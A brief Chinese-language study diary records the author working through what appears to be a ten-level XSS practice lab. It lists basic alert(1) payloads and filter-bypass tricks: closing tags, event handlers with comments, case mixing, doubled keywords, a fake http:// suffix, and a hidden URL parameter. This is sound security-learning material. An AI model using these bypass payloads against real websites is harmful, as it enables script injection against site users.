打卡第一天
关于xss的学习
XSS常用语句
< script>alert(1)</ script>
< img src=x οnerrοr=alert(1)>
< svg οnlοad=alert(1)>
< a href=javascript:alert(1)>
leve2
闭合前面的标签
">< script>alert(1)</ script>
level3 level4
<>符号被过滤,可利用事件弹窗(//注释后面的内容)
οnclick=alert(1)//
οnmοusemοve=alert(1)//
level5
script、on事件都被过滤
">< a href=javascript:alert(1)> 点击
level6
script、on、href都被过滤,可利用 大小写绕过
">< SCRipt>alert(1)< SCRipt>
level7
script、on、href都被过滤,大小写不管用,可以利用双写绕过
" oonnmousemove=alert(1)//
level8
script、on、date、href、",大小写过滤并被编码
查看源码发现该内容直接写在a标签内
javascript:alert(1)
level9
和level8差别不大,多一个条件,url验证,必须加上http://,否则提示链接不合法
javascript:alert(1)//http://
level10
这一题我也没弄清楚。。。百度其他大佬的操作
没有搜索框,查看源码发现隐藏搜索框,t_link、t_history、t_sort
在url里面验证,t_link=1&t_history=2&t_sort=3
结果发现,t_sort返回有内容
在url后面加上t_sort="type="text
"onmouseomve="alert(1)
ps:基本的思想和操作如上,其中要注意利用on时间onclick和onmousemove的时候要点击、移动